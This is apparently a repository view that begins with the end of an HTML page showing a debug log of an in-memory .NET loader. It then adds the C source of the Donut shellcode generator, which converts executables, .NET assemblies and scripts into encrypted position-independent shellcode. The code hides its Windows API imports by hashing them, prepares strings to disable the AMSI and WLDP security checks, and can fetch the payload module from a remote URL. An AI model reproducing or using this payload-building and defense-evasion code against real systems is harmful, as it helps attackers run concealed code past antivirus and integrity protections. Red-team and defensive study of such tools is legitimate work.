486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+1359
-0
donut.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "donut.h"
32
33 #include "payload/payload_exe_x86.h"
34 #include "payload/payload_exe_x64.h"
35
36 #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; }
37 #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; }
38 #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; }
39 #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; }
40
41 // these have to be in same order as DONUT_INSTANCE structure in donut.h
42 static API_IMPORT api_imports[]=
43 {
44 {KERNEL32_DLL, "LoadLibraryA"},
45 {KERNEL32_DLL, "GetProcAddress"},
46 {KERNEL32_DLL, "GetModuleHandleA"},
47 {KERNEL32_DLL, "VirtualAlloc"},
48 {KERNEL32_DLL, "VirtualFree"},
49 {KERNEL32_DLL, "VirtualQuery"},
50 {KERNEL32_DLL, "VirtualProtect"},
51 {KERNEL32_DLL, "Sleep"},
52 {KERNEL32_DLL, "MultiByteToWideChar"},
53 {KERNEL32_DLL, "GetUserDefaultLCID"},
54
55 {OLEAUT32_DLL, "SafeArrayCreate"},
56 {OLEAUT32_DLL, "SafeArrayCreateVector"},
57 {OLEAUT32_DLL, "SafeArrayPutElement"},
58 {OLEAUT32_DLL, "SafeArrayDestroy"},
59 {OLEAUT32_DLL, "SafeArrayGetLBound"},
60 {OLEAUT32_DLL, "SafeArrayGetUBound"},
61 {OLEAUT32_DLL, "SysAllocString"},
62 {OLEAUT32_DLL, "SysFreeString"},
63 {OLEAUT32_DLL, "LoadTypeLib"},
64
65 {WININET_DLL, "InternetCrackUrlA"},
66 {WININET_DLL, "InternetOpenA"},
67 {WININET_DLL, "InternetConnectA"},
68 {WININET_DLL, "InternetSetOptionA"},
69 {WININET_DLL, "InternetReadFile"},
70 {WININET_DLL, "InternetCloseHandle"},
71 {WININET_DLL, "HttpOpenRequestA"},
72 {WININET_DLL, "HttpSendRequestA"},
73 {WININET_DLL, "HttpQueryInfoA"},
74
75 {MSCOREE_DLL, "CorBindToRuntime"},
76 {MSCOREE_DLL, "CLRCreateInstance"},
77
78 {OLE32_DLL, "CoInitializeEx"},
79 {OLE32_DLL, "CoCreateInstance"},
80 {OLE32_DLL, "CoUninitialize"},
81
82 { NULL, NULL }
83 };
84
85 // required to load .NET assemblies
86 static GUID xCLSID_CorRuntimeHost = {
87 0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}};
88
89 static GUID xIID_ICorRuntimeHost = {
90 0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}};
91
92 static GUID xCLSID_CLRMetaHost = {
93 0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde}};
94
95 static GUID xIID_ICLRMetaHost = {
96 0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16}};
97
98 static GUID xIID_ICLRRuntimeInfo = {
99 0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91}};
100
101 static GUID xIID_AppDomain = {
102 0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13}};
103
104 // required to load VBS and JS files
105 static GUID xIID_IUnknown = {
106 0x00000000, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
107
108 static GUID xIID_IDispatch = {
109 0x00020400, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
110
111 static GUID xIID_IHost = {
112 0x91afbd1b, 0x5feb, 0x43f5, {0xb0, 0x28, 0xe2, 0xca, 0x96, 0x06, 0x17, 0xec}};
113
114 static GUID xIID_IActiveScript = {
115 0xbb1a2ae1, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
116
117 static GUID xIID_IActiveScriptSite = {
118 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
119
120 static GUID xIID_IActiveScriptParse32 = {
121 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
122
123 static GUID xIID_IActiveScriptParse64 = {
124 0xc7ef7658, 0xe1ee, 0x480e, {0x97, 0xea, 0xd5, 0x2c, 0xb4, 0xd7, 0x6d, 0x17}};
125
126 static GUID xCLSID_VBScript = {
127 0xB54F3741, 0x5B07, 0x11cf, {0xA4, 0xB0, 0x00, 0xAA, 0x00, 0x4A, 0x55, 0xE8}};
128
129 static GUID xCLSID_JScript = {
130 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}};
131
132 // required to load XSL files
133 static GUID xCLSID_DOMDocument30 = {
134 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}};
135
136 static GUID xIID_IXMLDOMDocument = {
137 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}};
138
139 static GUID xIID_IXMLDOMNode = {
140 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}};
141
142 #if defined(_WIN32) | defined(_WIN64)
143 #include "include/mmap-windows.c"
144 #ifdef _MSC_VER
145 #define strcasecmp stricmp
146 #endif
147 #endif
148
149 // return pointer to DOS header
150 static PIMAGE_DOS_HEADER DosHdr(void *map) {
151 return (PIMAGE_DOS_HEADER)map;
152 }
153
154 // return pointer to NT headers
155 static PIMAGE_NT_HEADERS NtHdr (void *map) {
156 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
157 }
158
159 // return pointer to File header
160 static PIMAGE_FILE_HEADER FileHdr (void *map) {
161 return &NtHdr(map)->FileHeader;
162 }
163
164 // determines CPU architecture of binary
165 static int is32 (void *map) {
166 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
167 }
168
169 // return pointer to Optional header
170 static void* OptHdr (void *map) {
171 return (void*)&NtHdr(map)->OptionalHeader;
172 }
173
174 static PIMAGE_DATA_DIRECTORY Dirs (void *map) {
175 if (is32(map)) {
176 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
177 } else {
178 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
179 }
180 }
181
182 // valid dos header?
183 static int valid_dos_hdr (void *map) {
184 PIMAGE_DOS_HEADER dos = DosHdr(map);
185
186 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
187 return (dos->e_lfanew != 0);
188 }
189
190 // valid nt headers
191 static int valid_nt_hdr (void *map) {
192 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
193 }
194
195 static ULONG64 rva2ofs (void *base, DWORD rva) {
196 DWORD i;
197 ULONG64 ofs;
198 PIMAGE_DOS_HEADER dos;
199 PIMAGE_NT_HEADERS nt;
200 PIMAGE_SECTION_HEADER sh;
201
202 dos = (PIMAGE_DOS_HEADER)base;
203 nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
204 sh = IMAGE_FIRST_SECTION(nt);
205
206 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
207 if (rva >= sh[i].VirtualAddress &&
208 rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) {
209
210 ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
211 return ofs;
212 }
213 }
214 return -1;
215 }
216
217 // map a file into memory for reading
218 static int map_file(const char *path, file_info *fi) {
219 struct stat fs;
220
221 DPRINT("Reading size of file : %s", path);
222 if(stat(path, &fs) != 0) {
223 return DONUT_ERROR_FILE_NOT_FOUND;
224 }
225
226 if(fs.st_size == 0) {
227 return DONUT_ERROR_FILE_EMPTY;
228 }
229
230 DPRINT("Opening %s", path);
231 fi->fd = open(path, O_RDONLY);
232
233 if(fi->fd < 0) {
234 return DONUT_ERROR_FILE_ACCESS;
235 }
236
237 fi->size = fs.st_size;
238
239 // map into memory
240 DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
241 fi->map = mmap(NULL, fi->size,
242 PROT_READ, MAP_PRIVATE, fi->fd, 0);
243
244 // no mapping? close file
245 if(fi->map == NULL) {
246 close(fi->fd);
247 fi->map = NULL;
248 return DONUT_ERROR_NO_MEMORY;
249 }
250 return DONUT_ERROR_SUCCESS;
251 }
252
253 // unmap a file from memory previously opened with map_file()
254 static int unmap_file(file_info *fi) {
255
256 if(fi == NULL) return 0;
257
258 DPRINT("Unmapping");
259 munmap(fi->map, fi->size);
260
261 DPRINT("Closing");
262 close(fi->fd);
263
264 return 1;
265 }
266
267 static int get_file_info(const char *path, file_info *fi) {
268 PIMAGE_NT_HEADERS nt;
269 PIMAGE_DATA_DIRECTORY dir;
270 PMDSTORAGESIGNATURE pss;
271 PIMAGE_COR20_HEADER cor;
272 DWORD dll, rva, ofs, cpu;
273 PCHAR ext;
274 int err = DONUT_ERROR_SUCCESS;
275
276 DPRINT("Entering.");
277
278 // invalid parameters passed?
279 if(path == NULL || fi == NULL) {
280 return DONUT_ERROR_INVALID_PARAMETER;
281 }
282 // zero initialize file_info structure
283 memset(fi, 0, sizeof(file_info));
284
285 DPRINT("Checking extension of %s", path);
286 ext = strrchr(path, '.');
287
288 // no extension? exit
289 if(ext == NULL) {
290 return DONUT_ERROR_FILE_INVALID;
291 }
292 DPRINT("Extension is \"%s\"", ext);
293
294 // VBScript?
295 if (strcasecmp(ext, ".vbs") == 0) {
296 DPRINT("Module is VBS");
297 fi->type = DONUT_MODULE_VBS;
298 fi->arch = DONUT_ARCH_ANY;
299 } else
300 // JScript?
301 if (strcasecmp(ext, ".js") == 0) {
302 DPRINT("Module is JS");
303 fi->type = DONUT_MODULE_JS;
304 fi->arch = DONUT_ARCH_ANY;
305 } else
306 // XSL?
307 if (strcasecmp(ext, ".xsl") == 0) {
308 DPRINT("Module is XSL");
309 fi->type = DONUT_MODULE_XSL;
310 fi->arch = DONUT_ARCH_ANY;
311 } else
312 // EXE?
313 if (strcasecmp(ext, ".exe") == 0) {
314 DPRINT("Module is EXE");
315 fi->type = DONUT_MODULE_EXE;
316 } else
317 // DLL?
318 if (strcasecmp(ext, ".dll") == 0) {
319 DPRINT("Module is DLL");
320 fi->type = DONUT_MODULE_DLL;
321 } else {
322 // unrecognized extension
323 return DONUT_ERROR_FILE_INVALID;
324 }
325
326 DPRINT("Mapping %s into memory", path);
327
328 err = map_file(path, fi);
329 if(err != DONUT_ERROR_SUCCESS) return err;
330
331 // file is EXE or DLL?
332 if(fi->type == DONUT_MODULE_DLL ||
333 fi->type == DONUT_MODULE_EXE)
334 {
335 DPRINT("Checking DOS header");
336
337 if(!valid_dos_hdr(fi->map)) {
338 err = DONUT_ERROR_FILE_INVALID;
339 goto cleanup;
340 }
341 DPRINT("Checking NT header");
342
343 if(!valid_nt_hdr(fi->map)) {
344 err = DONUT_ERROR_FILE_INVALID;
345 goto cleanup;
346 }
347 DPRINT("Checking IMAGE_DATA_DIRECTORY");
348
349 dir = Dirs(fi->map);
350
351 if(dir == NULL) {
352 err = DONUT_ERROR_FILE_INVALID;
353 goto cleanup;
354 }
355 DPRINT("Checking characteristics");
356
357 nt = NtHdr(fi->map);
358 dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
359 cpu = is32(fi->map);
360 rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;
361
362 // set the CPU architecture for file
363 fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
364
365 // if COM directory present
366 if(rva != 0) {
367 DPRINT("COM Directory found");
368
369 // set type to EXE or DLL assembly
370 fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
371
372 // try read the runtime version from meta header
373 strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);
374
375 ofs = rva2ofs(fi->map, rva);
376 if (ofs != -1) {
377 cor = (PIMAGE_COR20_HEADER)(ofs + fi->map);
378 rva = cor->MetaData.VirtualAddress;
379 if(rva != 0) {
380 ofs = rva2ofs(fi->map, rva);
381 if(ofs != -1) {
382 pss = (PMDSTORAGESIGNATURE)(ofs + fi->map);
383 DPRINT("Runtime version : %s", (char*)pss->pVersion);
384 strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
385 }
386 }
387 }
388 }
389 }
390 cleanup:
391 if(err != DONUT_ERROR_SUCCESS) {
392 unmap_file(fi);
393 }
394 DPRINT("Leaving.");
395 return err;
396 }
397
398 // check if DLL exports function name
399 static int is_dll_export(file_info *fi, const char *function) {
400 PIMAGE_DATA_DIRECTORY dir;
401 PIMAGE_EXPORT_DIRECTORY exp;
402 DWORD rva, ofs, cnt;
403 PDWORD sym;
404 PCHAR str;
405 int found = 0;
406
407 DPRINT("Entering.");
408
409 dir = Dirs(fi->map);
410 if(dir != NULL) {
411 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
412 DPRINT("EAT VA : %lx", rva);
413 if(rva != 0) {
414 ofs = rva2ofs(fi->map, rva);
415 if(ofs != -1) {
416 exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs);
417 cnt = exp->NumberOfNames;
418 DPRINT("Number of exported functions : %lx", cnt);
419
420 if(cnt != 0) {
421 sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map);
422 // scan array for symbol
423 do {
424 str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map);
425 DPRINT("Checking %s", str);
426 // if match found, exit
427 if(strcmp(str, function) == 0) {
428 DPRINT("Found API");
429 found = 1;
430 break;
431 }
432 } while (--cnt);
433 }
434 }
435 }
436 }
437 DPRINT("Leaving.");
438 return found;
439 }
440
441 // returns 1 on success else <=0
442 static int CreateRandom(void *buf, uint64_t len) {
443
444 #if defined(WINDOWS)
445 HCRYPTPROV prov;
446 int ok;
447
448 // 1. acquire crypto context
449 if(!CryptAcquireContext(
450 &prov, NULL, NULL,
451 PROV_RSA_AES,
452 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
453
454 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
455 CryptReleaseContext(prov, 0);
456
457 return ok;
458 #else
459 int fd;
460 uint64_t r=0;
461 uint8_t *p=(uint8_t*)buf;
462
463 DPRINT("Opening /dev/urandom to acquire %li bytes", len);
464 fd = open("/dev/urandom", O_RDONLY);
465
466 if(fd > 0) {
467 for(r=0; r<len; r++, p++) {
468 if(read(fd, p, 1) != 1) break;
469 }
470 close(fd);
471 }
472 DPRINT("Acquired %li of %li bytes requested", r, len);
473 return r == len;
474 #endif
475 }
476
477 // Generate a random string, not exceeding DONUT_MAX_NAME bytes
478 // tbl is from https://stackoverflow.com/a/27459196
479 static int GenRandomString(void *output, uint64_t len) {
480 uint8_t rnd[DONUT_MAX_NAME];
481 int i;
482 char tbl[]="HMN34P67R9TWCXYF";
483 char *str = (char*)output;
484
485 if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;
486
487 // generate DONUT_MAX_NAME random bytes
488 if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;
489
490 // generate a string using unambiguous characters
491 for(i=0; i<len; i++) {
492 str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)];
493 }
494 str[i] = 0;
495 return 1;
496 }
497
498 // cheapo conversion from utf8 to utf16
499 static uint64_t utf8_to_utf16(void* dst, const char* src) {
500 uint16_t *out = (uint16_t*)dst;
501 uint64_t i;
502
503 for(i=0; src[i] != 0; i++) {
504 out[i] = src[i];
505 }
506 return i;
507 }
508
509 static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
510 PDONUT_MODULE mod = NULL;
511 uint64_t len = 0;
512 char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
513 int cnt, err=DONUT_ERROR_SUCCESS;
514
515 DPRINT("Entering.");
516
517 // Allocate memory for module information and contents of file
518 len = sizeof(DONUT_MODULE) + fi->size;
519 DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
520 mod = calloc(len, 1);
521
522 // Memory not allocated? exit
523 if(mod == NULL) {
524 return DONUT_ERROR_NO_MEMORY;
525 }
526
527 // Set the type of module
528 mod->type = fi->type;
529
530 // DotNet assembly?
531 if(mod->type == DONUT_MODULE_NET_DLL ||
532 mod->type == DONUT_MODULE_NET_EXE)
533 {
534 // If no domain name specified, generate a random one
535 if(c->domain[0] == 0) {
536 if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
537 err = DONUT_ERROR_RANDOM;
538 goto cleanup;
539 }
540 }
541 // convert to unicode format.
542 // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
543 DPRINT("Domain : %s", c->domain);
544 utf8_to_utf16(mod->domain, c->domain);
545
546 // Assembly is DLL? Copy the class and method
547 if(mod->type == DONUT_MODULE_NET_DLL) {
548 DPRINT("Class : %s", c->cls);
549 utf8_to_utf16(mod->cls, c->cls);
550
551 DPRINT("Method : %s", c->method);
552 utf8_to_utf16(mod->method, c->method);
553 }
554 // If no runtime specified in configuration, use version from assembly
555 if(c->runtime[0] == 0) {
556 strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
557 }
558 DPRINT("Runtime : %s", c->runtime);
559 utf8_to_utf16(mod->runtime, c->runtime);
560 } else
561 // Unmanaged DLL? check for exported api
562 if(mod->type == DONUT_MODULE_DLL &&
563 c->method[0] != 0)
564 {
565 DPRINT("DLL function : %s", c->method);
566 strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
567 }
568
569 // Parameters specified?
570 if(c->param[0] != 0) {
571 strncpy(parambuf, c->param, sizeof(parambuf)-1);
572 cnt = 0;
573 // Split by comma or semi-colon
574 param = strtok(parambuf, ",;");
575
576 while(param != NULL && cnt < DONUT_MAX_PARAM) {
577 if(strlen(param) >= DONUT_MAX_NAME) {
578 DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)",
579 param, DONUT_MAX_NAME);
580 err = DONUT_ERROR_INVALID_PARAMETER;
581 goto cleanup;
582 }
583 DPRINT("Adding \"%s\"", param);
584 // convert ansi string to wide character string
585 utf8_to_utf16(mod->param[cnt++], param);
586
587 // get next parameter
588 param = strtok(NULL, ",;");
589 }
590 // set number of parameters
591 mod->param_cnt = cnt;
592 }
593
594 // set length of module data
595 mod->len = fi->size;
596 // read module into memory
597 memcpy(&mod->data, fi->map, fi->size);
598 // update configuration with pointer to module
599 c->mod = mod;
600 c->mod_len = len;
601
602 cleanup:
603 // if there was an error, free memory for module
604 if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
605 free(mod);
606 c->mod = NULL;
607 c->mod_len = 0;
608 }
609 DPRINT("Leaving.");
610 return err;
611 }
612
613 static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
614 DONUT_CRYPT inst_key, mod_key;
615 PDONUT_INSTANCE inst;
616 uint64_t inst_len;
617 uint64_t dll_hash;
618 int cnt;
619
620 DPRINT("Entering.");
621
622 // Allocate memory for the size of instance based on the type
623 DPRINT("Allocating space for instance");
624 inst_len = sizeof(DONUT_INSTANCE);
625
626 // if this is a PIC instance, add the size of module
627 // that will be appended to the end of structure
628 if(c->inst_type == DONUT_INSTANCE_PIC) {
629 DPRINT("The size of module is %" PRIi64 " bytes. "
630 "Adding to size of instance.", c->mod_len);
631 inst_len += c->mod_len;
632 }
633 // allocate zero-initialized memory for instance
634 inst = (PDONUT_INSTANCE)calloc(inst_len, 1);
635
636 // Memory allocation failed? exit
637 if(inst == NULL) {
638 return DONUT_ERROR_NO_MEMORY;
639 }
640
641 #if !defined(NOCRYPTO)
642 DPRINT("Generating random key for instance");
643 if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
644 return DONUT_ERROR_RANDOM;
645 }
646 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
647
648 DPRINT("Generating random key for module");
649 if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
650 return DONUT_ERROR_RANDOM;
651 }
652 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
653
654 DPRINT("Generating random string to verify decryption");
655 if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
656 return DONUT_ERROR_RANDOM;
657 }
658 #endif
659
660 DPRINT("Generating random IV for Maru hash");
661 if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
662 return DONUT_ERROR_RANDOM;
663 }
664
665 DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);
666
667 for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
668 // calculate hash for DLL string
669 dll_hash = maru(api_imports[cnt].module, inst->iv);
670
671 // calculate hash for API string.
672 // xor with DLL hash and store in instance
673 inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;
674
675 DPRINT("Hash for %-15s : %-22s = %" PRIX64,
676 api_imports[cnt].module,
677 api_imports[cnt].name,
678 inst->api.hash[cnt]);
679 }
680 // save how many API to resolve
681 inst->api_cnt = cnt;
682 inst->dll_cnt = 0;
683
684 strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
685 strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
686 strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
687 strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");
688
689 // if module is .NET assembly
690 if(c->mod_type == DONUT_MODULE_NET_DLL ||
691 c->mod_type == DONUT_MODULE_NET_EXE)
692 {
693 DPRINT("Copying GUID structures and DLL strings for loading .NET assemblies");
694
695 memcpy(&inst->xIID_AppDomain, &xIID_AppDomain, sizeof(GUID));
696 memcpy(&inst->xIID_ICLRMetaHost, &xIID_ICLRMetaHost, sizeof(GUID));
697 memcpy(&inst->xCLSID_CLRMetaHost, &xCLSID_CLRMetaHost, sizeof(GUID));
698 memcpy(&inst->xIID_ICLRRuntimeInfo, &xIID_ICLRRuntimeInfo, sizeof(GUID));
699 memcpy(&inst->xIID_ICorRuntimeHost, &xIID_ICorRuntimeHost, sizeof(GUID));
700 memcpy(&inst->xCLSID_CorRuntimeHost, &xCLSID_CorRuntimeHost, sizeof(GUID));
701 } else
702 // if module is VBS or JS
703 if(c->mod_type == DONUT_MODULE_VBS ||
704 c->mod_type == DONUT_MODULE_JS)
705 {
706 DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");
707
708 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
709 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
710 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
711 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
712 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
713 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
714 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
715
716 utf8_to_utf16(inst->wscript, "WScript");
717 utf8_to_utf16(inst->wscript_exe, "wscript.exe");
718
719 if(c->mod_type == DONUT_MODULE_VBS) {
720 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
721 } else {
722 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
723 }
724 } else
725 // if module is XSL
726 if(c->mod_type == DONUT_MODULE_XSL)
727 {
728 DPRINT("Copying GUID structures for loading XSL to instance");
729
730 memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
731 memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
732 memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID));
733 }
734
735 // required to disable AMSI
736 strcpy(inst->amsi.s, "AMSI");
737 strcpy(inst->amsiInit, "AmsiInitialize");
738 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
739 strcpy(inst->amsiScanStr, "AmsiScanString");
740
741 strcpy(inst->clr, "CLR");
742
743 // required to disable WLDP
744 strcpy(inst->wldp, "WLDP");
745 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
746 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
747
748 // set the type of instance we're creating
749 inst->type = c->inst_type;
750
751 // if the module will be downloaded
752 // set the URL parameter and request verb
753 if(inst->type == DONUT_INSTANCE_URL) {
754 // generate a random name for module
755 // that will be saved to disk
756 if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
757 return DONUT_ERROR_RANDOM;
758 }
759 DPRINT("Generated random name for module : %s", c->modname);
760
761 DPRINT("Setting URL parameters");
762 strcpy(inst->http.url, c->url);
763 // append module name
764 strcat(inst->http.url, c->modname);
765 // set the request verb
766 strcpy(inst->http.req, "GET");
767
768 DPRINT("Payload will attempt download from : %s", inst->http.url);
769 }
770
771 inst->mod_len = c->mod_len;
772 inst->len = inst_len;
773 c->inst = inst;
774 c->inst_len = inst_len;
775
776 #if !defined(NOCRYPTO)
777 if(c->inst_type == DONUT_INSTANCE_URL) {
778 DPRINT("encrypting module for download");
779
780 c->mod->mac = maru(inst->sig, inst->iv);
781
782 donut_encrypt(
783 mod_key.mk,
784 mod_key.ctr,
785 c->mod,
786 c->mod_len);
787 }
788 #endif
789 // if PIC, copy module to instance
790 if(inst->type == DONUT_INSTANCE_PIC) {
791 DPRINT("Copying module data to instance");
792 memcpy(&c->inst->module.x, c->mod, c->mod_len);
793 }
794
795 #if !defined(NOCRYPTO)
